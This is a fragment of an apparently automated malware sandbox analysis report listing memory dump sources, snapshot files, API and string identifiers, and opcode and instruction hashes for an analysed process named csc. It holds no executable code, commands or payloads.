                                                                                            • Snapshot File: hcaresult_2_2_5760000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemoryStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1890195054-0
                                                                                            • Opcode ID: 2969aae37bbabfefd6a980ba07f43c2e7c7c8be3cf33498a7701734169566f4b
                                                                                            • Instruction ID: d3e217c249e21675fee7059ff23398e33876cbb98160ccd16001f41665db2b56
                                                                                            • Opcode Fuzzy Hash: 2969aae37bbabfefd6a980ba07f43c2e7c7c8be3cf33498a7701734169566f4b
                                                                                            • Instruction Fuzzy Hash: 2331BBB4D002589FCB10CFAAD584ADEFBF0AB49310F14806AE814B3210D774A941CF65
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2002004816.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_5540000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: dbq
                                                                                            • API String ID: 0-1887291361
                                                                                            • Opcode ID: 3ee08eefad6d77da6f3cd4a0c792db1686430d212e983e310c98b6a4e476776e
                                                                                            • Instruction ID: c049b0b74cdf976d7522f67a76c0f67654ec583af9bbf5d2fc1fa26436f0baff
                                                                                            • Opcode Fuzzy Hash: 3ee08eefad6d77da6f3cd4a0c792db1686430d212e983e310c98b6a4e476776e
                                                                                            • Instruction Fuzzy Hash: 75212870E112199FCF04DFA8E958AEDBBB6FB49305F205829E005B7291DB3899448F65
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2002004816.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_5540000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: dbq
                                                                                            • API String ID: 0-1887291361
                                                                                            • Opcode ID: ab40d60c35ea35e843672f440b5540931a47af42b48f93cdaf4b5bf0fbe1b5b2
                                                                                            • Instruction ID: 35a0c59e41090aa47b79388a0531ee37df2704f2383b16267b55da0436e3015a
                                                                                            • Opcode Fuzzy Hash: ab40d60c35ea35e843672f440b5540931a47af42b48f93cdaf4b5bf0fbe1b5b2
                                                                                            • Instruction Fuzzy Hash: 05214A70E112099FCF04DFA9E448AEDBBB6FB49305F205429E505B73A1DB389944CF65
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2002004816.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_5540000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f6034a659b6a8b2ff427fe2a852067f90d8a27c1fde4f6fa0f85dc88ade5ba88
                                                                                            • Instruction ID: 6b65a1730d18841065b9aa95233ba9f7ec8e32b17034378ad6200152af04578d
                                                                                            • Opcode Fuzzy Hash: f6034a659b6a8b2ff427fe2a852067f90d8a27c1fde4f6fa0f85dc88ade5ba88
                                                                                            • Instruction Fuzzy Hash: C3F0E530A062489FCB01DBB8F6186DC7FB0FF01214B114AAAD014972D1CB305E54CB00
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2002004816.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_5540000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 575cc9e88d376c87ca386182efe57d994ddc7c897240f7ecff69f8c90dad40db
                                                                                            • Instruction ID: d33020274d900e7e877dcc0bc0f2ebf36da919a7791254d42bc4ce2b4f83b8a2
                                                                                            • Opcode Fuzzy Hash: 575cc9e88d376c87ca386182efe57d994ddc7c897240f7ecff69f8c90dad40db
                                                                                            • Instruction Fuzzy Hash: 11E04630A0220DEFCB04EFA8E509ADDBBB9FB05304F6045A9E40597250EF716E00DB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2077161200.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_4da0000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: dbq
                                                                                            • API String ID: 0-1887291361
                                                                                            • Opcode ID: 200b7fc06d098eb3182e85e14729bb8627be47a0a003e29163b56ead7313d50c
                                                                                            • Instruction ID: dbd0a99ef46d8131e35ae19beb3340f3e0542dad9a2256fc28b6645921570f21
                                                                                            • Opcode Fuzzy Hash: 200b7fc06d098eb3182e85e14729bb8627be47a0a003e29163b56ead7313d50c
                                                                                            • Instruction Fuzzy Hash: 83217C70E01219AFDB05DFB8E864AEDBBF5FB49304F005428E405B7390DB38A945CBA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2077161200.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_4da0000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: dbq
                                                                                            • API String ID: 0-1887291361
                                                                                            • Opcode ID: 5b4eb693ca7dc0637f8b9f31654b8b3ff06b3290f10e967ecf82b76f0aee6d33
                                                                                            • Instruction ID: 0022c1ec1700377e757cc1033f4cd200c7d405d0696d9fb410cae0e31aa20a81
                                                                                            • Opcode Fuzzy Hash: 5b4eb693ca7dc0637f8b9f31654b8b3ff06b3290f10e967ecf82b76f0aee6d33
                                                                                            • Instruction Fuzzy Hash: 99212870E012099FEB05DFA8E464AEDBBF5FB4A315F105528E405B3390DB38A945CB65
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2077161200.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_4da0000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ad5dd5a7109322da31b75e2ad12f772db72ef4d1e89d2152bf16934ac1828369
                                                                                            • Instruction ID: 05ba42f1c13ca764c292e88ea6c72a0e3e71fb7548bfc30f70b23e2d3ffff322
                                                                                            • Opcode Fuzzy Hash: ad5dd5a7109322da31b75e2ad12f772db72ef4d1e89d2152bf16934ac1828369
                                                                                            • Instruction Fuzzy Hash: 6FE0E571A0020DEFD701EBA8F45569C7778EB41314F000265D40193251EE756F05CB51
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.2077161200.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_4da0000_csc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a6be403989b82daa68298aec8490f487a3916ac260e006660a238078a4cbb124
                                                                                            • Instruction ID: f17c3ecf3061ef30dfadb057a98ea9feb8acd7f506df4869fd8279dea552b61e
                                                                                            • Opcode Fuzzy Hash: a6be403989b82daa68298aec8490f487a3916ac260e006660a238078a4cbb124
                                                                                            • Instruction Fuzzy Hash: F1E04F30601209EFDB01EFACF51565DB7B9EB45304F404568D80593354DF756E00DB51